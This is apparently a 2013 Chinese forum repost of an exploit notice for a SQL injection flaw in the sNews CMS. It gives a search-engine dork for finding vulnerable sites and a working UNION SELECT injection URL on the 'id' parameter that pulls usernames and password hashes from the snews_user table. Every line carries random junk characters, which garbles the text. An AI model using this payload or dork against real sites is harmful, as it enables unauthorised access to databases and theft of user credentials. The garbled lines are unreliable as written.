标题: CMS snews SQL Injection Vulnerability
1 B! Y# V& V8 ]' Y% [作者: By onestree
1 N# c. t8 ^3 k下载地址 : http://snewscms.com/
: w7 {& Z" Q' h' P/ w6 T- ]% t# v测试平台 : ubuntu 12.10 / win 7
8 t C6 ]6 W, W& V, B4 t, V关键词: inurl:"tanyakan pada rumput yang bergoyang"2 r0 h' ?9 ?) B
+ r8 p2 K% S' i$ j9 e
8 @2 B1 K6 j G! X* \
*************************************************************
! m |$ F+ j& P O$ D& A+ [ 2 e; }4 g0 s, d7 ~# f3 B, O$ u
SQL poc:
/ r+ I: _' s9 Q* r$ `! H* ? % u9 q; V% E/ z7 U" [. j
http://www.2cto.com /snews/snews.php?act=shownews&id=[SQL]/ |" i2 K/ Y, [$ ^) h. V
& `+ X3 X- f" H5 ~( Y; J) a# ^
示例
; B8 c ^' e8 Q 4 r7 C0 }3 u5 K( r
http://localhost/snews/snews.php?act=shownews&id=-23/**/union/**/select/**/0,1,concat(user_name,char(32),user_pass),3,4,5,6/**/from/**/snews_user/**/where/**/id%20like%201/*- z4 I8 S: f, }0 u
6 R; n# Z" y: z2 U0 u
' a6 n, V: `" L# L0 C3 Q* O致谢:6 r/ E b7 a/ O/ J5 p4 G, _
* `, e& H7 R$ H7 ^3 x
Exploit-db | Alex_Ownz | alm.teardrop | abhelink | kalong666 | prorebell U" f) s9 x8 U! G0 n! P+ F
% O7 ^4 h! w7 y# ]3 \) r
indonesiancoder - moeslimh4x0r - go-coder
* R# T Q; @3 A' T: O7 C1 _' g) p
6 c# U5 Q/ g# j1 w7 A' i }7 `spesial my hunny :*+ l% b9 H( h: \
|
发表于 2013-1-23 08:55:06
收藏
支持
反对